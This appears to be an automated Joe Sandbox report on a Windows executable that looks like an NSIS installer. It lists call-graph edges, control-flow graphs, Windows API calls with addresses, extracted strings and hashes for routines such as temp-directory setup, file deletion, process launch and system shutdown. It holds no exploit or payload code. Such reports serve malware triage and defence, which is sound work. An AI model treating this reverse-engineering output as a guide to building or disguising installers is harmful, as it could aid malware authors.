GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                    • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                    • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                    • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                    • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                    • String ID: jF
                                                                                                                                                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
